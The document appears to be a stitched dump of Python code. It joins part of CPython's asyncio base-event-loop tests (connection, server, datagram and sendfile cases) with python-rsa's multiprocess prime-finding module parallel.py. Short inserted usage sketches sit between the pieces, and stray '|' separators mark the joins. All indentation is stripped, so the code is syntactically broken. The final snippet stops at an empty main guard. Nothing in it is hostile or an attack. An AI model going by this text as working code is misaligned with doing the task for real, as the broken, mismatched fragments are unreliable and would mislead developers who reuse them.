@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with sock:
coro = self.loop.create_server(lambda: None, sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@unittest.skipUnless(hasattr(socket, 'AF_INET6'), 'no IPv6 support')
def test_create_server_ipv6(self):
async def main():
srv = await asyncio.start_server(
lambda: None, '::1', 0, loop=self.loop)
try:
self.assertGreater(len(srv.sockets), 0)
finally:
srv.close()
await srv.wait_closed()
try:
self.loop.run_until_complete(main())
except OSError as ex:
if (hasattr(errno, 'EADDRNOTAVAIL') and
ex.errno == errno.EADDRNOTAVAIL):
self.skipTest('failed to bind to ::1')
else:
raise
def test_create_datagram_endpoint_wrong_sock(self):
sock = socket.socket(socket.AF_INET)
with sock:
coro = self.loop.create_datagram_endpoint(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A UDP Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_connection_no_host_port_sock(self):
coro = self.loop.create_connection(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_getaddrinfo(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
yield from []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
@patch_socket
def test_create_connection_multiple_errors_local_addr(self, m_socket):
def bind(addr):
if addr[0] == '0.0.0.1':
err = OSError('Err')
err.strerror = 'Err'
raise err
m_socket.socket.return_value.bind = bind
@asyncio.coroutine
def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError('Err2')
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertTrue(str(cm.exception).startswith('Multiple exceptions: '))
self.assertTrue(m_socket.socket.return_value.close.called)
def _test_create_connection_ip_addr(self, m_socket, allow_inet_pton):
# Test the fallback code, even if this system has inet_pton.
if not allow_inet_pton:
del m_socket.inet_pton
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, '1.2.3.4', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('1.2.3.4', 80))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
sock.family = socket.AF_INET6
coro = self.loop.create_connection(asyncio.Protocol, '::1', 80)
t, p = self.loop.run_until_complete(coro)
try:
# Without inet_pton we use getaddrinfo, which transforms ('::1', 80)
# to ('::1', 80, 0, 0). The last 0s are flow info, scope id.
[address] = sock.connect.call_args[0]
host, port = address[:2]
self.assertRegex(host, r'::(0\.)*1')
self.assertEqual(port, 80)
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@patch_socket
def test_create_connection_ip_addr(self, m_socket):
self._test_create_connection_ip_addr(m_socket, True)
@patch_socket
def test_create_connection_no_inet_pton(self, m_socket):
self._test_create_connection_ip_addr(m_socket, False)
@patch_socket
def test_create_connection_service_name(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
for service, port in ('http', 80), (b'http', 80):
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('127.0.0.1', port))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
for service in 'nonsense', b'nonsense':
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
def test_create_connection_no_local_addr(self):
@asyncio.coroutine
def getaddrinfo(host, *args, **kw):
if host == 'example.com':
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
else:
return []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_connection_bluetooth(self, m_socket):
        # See http://bugs.python.org/issue27136: fall back to getaddrinfo when
        # we can't recognize that an address is already resolved, e.g. a
        # Bluetooth address.
addr = ('00:01:02:03:04:05', 1)
def getaddrinfo(host, port, *args, **kw):
assert (host, port) == addr
return [(999, 1, 999, '', (addr, 1))]
m_socket.getaddrinfo = getaddrinfo
sock = m_socket.socket()
coro = self.loop.sock_connect(sock, addr)
self.loop.run_until_complete(coro)
def test_create_connection_ssl_server_hostname_default(self):
self.loop.getaddrinfo = mock.Mock()
def mock_getaddrinfo(*args, **kwds):
f = asyncio.Future(loop=self.loop)
f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
socket.SOL_TCP, '', ('1.2.3.4', 80))])
return f
self.loop.getaddrinfo.side_effect = mock_getaddrinfo
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.return_value = self.loop.create_future()
self.loop.sock_connect.return_value.set_result(None)
self.loop._make_ssl_transport = mock.Mock()
class _SelectorTransportMock:
_sock = None
def get_extra_info(self, key):
return mock.Mock()
def close(self):
self._sock.close()
def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
**kwds):
waiter.set_result(None)
transport = _SelectorTransportMock()
transport._sock = sock
return transport
self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
ANY = mock.ANY
handshake_timeout = object()
# First try the default server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='python.org',
ssl_handshake_timeout=handshake_timeout)
# Next try an explicit server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
# Finally try an explicit empty server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
def test_create_connection_no_ssl_server_hostname_errors(self):
# When not using ssl, server_hostname must be None.
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='python.org')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
# When using ssl, server_hostname may be None if host is non-empty.
coro = self.loop.create_connection(MyProto, '', 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, None, 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
sock = socket.socket()
coro = self.loop.create_connection(MyProto, None, None,
ssl=True, sock=sock)
self.addCleanup(sock.close)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_server_empty_host(self):
# if host is empty string use None instead
host = object()
@asyncio.coroutine
def getaddrinfo(*args, **kw):
nonlocal host
host = args[0]
yield from []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
fut = self.loop.create_server(MyProto, '', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertIsNone(host)
def test_create_server_host_port_sock(self):
fut = self.loop.create_server(
MyProto, '0.0.0.0', 0, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_host_port_sock(self):
fut = self.loop.create_server(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_getaddrinfo(self):
getaddrinfo = self.loop.getaddrinfo = mock.Mock()
getaddrinfo.return_value = self.loop.create_future()
getaddrinfo.return_value.set_result(None)
f = self.loop.create_server(MyProto, 'python.org', 0)
self.assertRaises(OSError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_nosoreuseport(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_soreuseport_only_defined(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.return_value = mock.Mock()
m_socket.SO_REUSEPORT = -1
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_cant_bind(self, m_socket):
class Err(OSError):
strerror = 'error'
m_socket.getaddrinfo.return_value = [
(2, 1, 6, '', ('127.0.0.1', 10100))]
m_socket.getaddrinfo._is_coroutine = False
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
@patch_socket
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
m_socket.getaddrinfo.return_value = []
m_socket.getaddrinfo._is_coroutine = False
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr='localhost')
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 1, 2, 3))
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_connect_err(self):
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_socket_err(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, local_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_no_matching_family(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol,
remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
self.assertRaises(
ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_setblk_err(self, m_socket):
m_socket.socket.return_value.setblocking.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
self.assertTrue(
m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_cant_bind(self, m_socket):
class Err(OSError):
pass
m_socket.getaddrinfo = socket.getaddrinfo
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_datagram_endpoint(
MyDatagramProto,
local_addr=('127.0.0.1', 0), family=socket.AF_INET)
self.assertRaises(Err, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
def test_create_datagram_endpoint_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', 0))
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
sock=sock)
transport, protocol = self.loop.run_until_complete(fut)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_sock_unix(self):
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(fut)
assert transport._sock.family == socket.AF_UNIX
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
def test_create_datagram_endpoint_sock_sockopts(self):
class FakeSock:
type = socket.SOCK_DGRAM
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, remote_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, family=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, proto=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, flags=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_address=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_port=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, allow_broadcast=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_datagram_endpoint_sockopts(self):
# Socket options should not be applied unless asked for.
# SO_REUSEADDR defaults to on for UNIX.
# SO_REUSEPORT is not available on all platforms.
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0))
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
reuse_address_default_on = (
os.name == 'posix' and sys.platform != 'cygwin')
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
if reuse_address_default_on:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
else:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=True,
reuse_port=reuseport_supported,
allow_broadcast=True)
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_nosoreuseport(self, m_socket):
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=False,
reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_ip_addr(self, m_socket):
def getaddrinfo(*args, **kw):
self.fail('should not have called getaddrinfo')
m_socket.getaddrinfo = getaddrinfo
m_socket.socket.return_value.bind = bind = mock.Mock()
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('1.2.3.4', 0),
reuse_address=False,
reuse_port=reuseport_supported)
t, p = self.loop.run_until_complete(coro)
try:
bind.assert_called_with(('1.2.3.4', 0))
m_socket.socket.assert_called_with(family=m_socket.AF_INET,
proto=m_socket.IPPROTO_UDP,
type=m_socket.SOCK_DGRAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
def test_accept_connection_retry(self):
sock = mock.Mock()
sock.accept.side_effect = BlockingIOError()
self.loop._accept_connection(MyProto, sock)
self.assertFalse(sock.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
sock = mock.Mock()
sock.fileno.return_value = 10
sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
self.loop._remove_reader = mock.Mock()
self.loop.call_later = mock.Mock()
self.loop._accept_connection(MyProto, sock)
self.assertTrue(m_log.error.called)
self.assertFalse(sock.close.called)
self.loop._remove_reader.assert_called_with(10)
self.loop.call_later.assert_called_with(
constants.ACCEPT_RETRY_DELAY,
# self.loop._start_serving
mock.ANY,
MyProto, sock, None, None, mock.ANY, mock.ANY)
def test_call_coroutine(self):
@asyncio.coroutine
def simple_coroutine():
pass
self.loop.set_debug(True)
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
with self.assertRaises(TypeError):
self.loop.call_soon(func)
with self.assertRaises(TypeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(TypeError):
self.loop.call_later(60, func)
with self.assertRaises(TypeError):
self.loop.call_at(self.loop.time() + 60, func)
with self.assertRaises(TypeError):
self.loop.run_until_complete(
self.loop.run_in_executor(None, func))
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
def stop_loop_cb(loop):
loop.stop()
@asyncio.coroutine
def stop_loop_coro(loop):
yield from ()
loop.stop()
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.0
# slow callback
self.loop.call_soon(stop_loop_cb, self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Handle.*stop_loop_cb.*> "
"took .* seconds$")
# slow task
asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Task.*stop_loop_coro.*> "
"took .* seconds$")
class RunningLoopTests(unittest.TestCase):
def test_running_loop_within_a_loop(self):
@asyncio.coroutine
def runner(loop):
loop.run_forever()
loop = asyncio.new_event_loop()
outer_loop = asyncio.new_event_loop()
try:
with self.assertRaisesRegex(RuntimeError,
'while another loop is running'):
outer_loop.run_until_complete(runner(loop))
finally:
loop.close()
outer_loop.close()
class BaseLoopSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
def connection_made(self, transport):
self.started = True
self.transport = transport
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
self.transport = None
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
cls.__old_bufsize = constants.SENDFILE_FALLBACK_READBUFFER_SIZE
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = 1024 * 16
with open(support.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = cls.__old_bufsize
support.unlink(support.TESTFN)
super().tearDownClass()
def setUp(self):
from asyncio.selector_events import BaseSelectorEventLoop
# BaseSelectorEventLoop() has no native implementation
self.loop = BaseSelectorEventLoop()
self.set_event_loop(self.loop)
self.file = open(support.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, blocking=False):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(blocking)
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
server = self.run_loop(self.loop.create_server(
lambda: proto, support.HOST, 0, family=socket.AF_INET))
addr = server.sockets[0].getsockname()
for _ in range(10):
try:
self.run_loop(self.loop.sock_connect(sock, addr))
except OSError:
self.run_loop(asyncio.sleep(0.5))
continue
else:
break
else:
# One last try, so we get the exception
self.run_loop(self.loop.sock_connect(sock, addr))
def cleanup():
server.close()
self.run_loop(server.wait_closed())
sock.close()
if proto.transport is not None:
proto.transport.close()
self.run_loop(proto.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test__sock_sendfile_native_failure(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(proto.data, b'')
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_no_fallback(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop.sock_sendfile(sock, self.file,
fallback=False))
self.assertEqual(self.file.tell(), 0)
self.assertEqual(proto.data, b'')
def test_sock_sendfile_fallback(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, len(self.DATA))
self.assertEqual(self.file.tell(), len(self.DATA))
self.assertEqual(proto.data, self.DATA)
def test_sock_sendfile_fallback_offset_and_count(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file,
1000, 2000))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, 2000)
self.assertEqual(self.file.tell(), 3000)
self.assertEqual(proto.data, self.DATA[1000:3000])
def test_blocking_socket(self):
self.loop.set_debug(True)
sock = self.make_socket(blocking=True)
with self.assertRaisesRegex(ValueError, "must be non-blocking"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_nonbinary_file(self):
sock = self.make_socket()
with open(support.TESTFN, 'r') as f:
with self.assertRaisesRegex(ValueError, "binary mode"):
self.run_loop(self.loop.sock_sendfile(sock, f))
def test_nonstream_socket(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(False)
self.addCleanup(sock.close)
with self.assertRaisesRegex(ValueError, "only SOCK_STREAM type"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_notint_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, 'count'))
def test_negative_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, -1))
def test_notint_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 'offset'))
def test_negative_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, -1))
if __name__ == '__main__':
unittest.main()
|
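The sendfile tests above drive loop.sock_sendfile directly against a BaseSelectorEventLoop; as a minimal sketch, this is how application code might call the same API over a connected, non-blocking stream socket (the host, port, and file name are illustrative assumptions):

import asyncio
import socket

async def send_file(path, host, port):
    loop = asyncio.get_event_loop()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setblocking(False)  # sock_sendfile requires a non-blocking socket
    await loop.sock_connect(sock, (host, port))
    try:
        with open(path, 'rb') as f:  # the file must be opened in binary mode
            # fallback=True lets the loop use a chunked read/sendall path
            # when a native sendfile implementation is unavailable.
            return await loop.sock_sendfile(sock, f, 0, None, fallback=True)
    finally:
        sock.close()

# Example: asyncio.get_event_loop().run_until_complete(send_file('payload.bin', '127.0.0.1', 8000))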
parallel.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions for parallel computation on multiple cores.
Introduced in Python-RSA 3.1.
.. note::
Requires Python 2.6 or newer.
"""
from __future__ import print_function
import multiprocessing as mp
from rsa._compat import range
import rsa.prime
import rsa.randnum
def _find_prime(nbits, pipe):
while True:
integer = rsa.randnum.read_random_odd_int(nbits)
# Test for primeness
if rsa.prime.is_prime(integer):
pipe.send(integer)
return
def getprime(nbits, poolsize):
"""Returns a prime number that can be stored in 'nbits' bits.
    Works in multiple processes at the same time.
>>> p = getprime(128, 3)
>>> rsa.prime.is_prime(p-1)
False
>>> rsa.prime.is_prime(p)
True
>>> rsa.prime.is_prime(p+1)
False
>>> from rsa import common
>>> common.bit_size(p) == 128
True
"""
(pipe_recv, pipe_send) = mp.Pipe(duplex=False)
# Create processes
try:
procs = [mp.Process(target=_find_prime, args=(nbits, pipe_send))
for _ in range(poolsize)]
# Start processes
for p in procs:
p.start()
result = pipe_recv.recv()
finally:
pipe_recv.close()
pipe_send.close()
# Terminate processes
for p in procs:
p.terminate()
return result
__all__ = ['getprime']
if __name__ == '__main__':
    print('Running doctests 100x or until failure')
import doctest
for count in range(100):
(failures, tests) = doctest.testmod()
if failures:
break
if count and count % 10 == 0:
print('%i times' % count)
print('Doctests done')
|
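For context, a minimal sketch of calling getprime from application code. The rsa.parallel and rsa.common import paths follow the doctest above; the 512-bit size and the pool of four workers are illustrative choices, and the __main__ guard matters because multiprocessing may re-import the calling module in each worker process:

import rsa.parallel
import rsa.common

if __name__ == '__main__':
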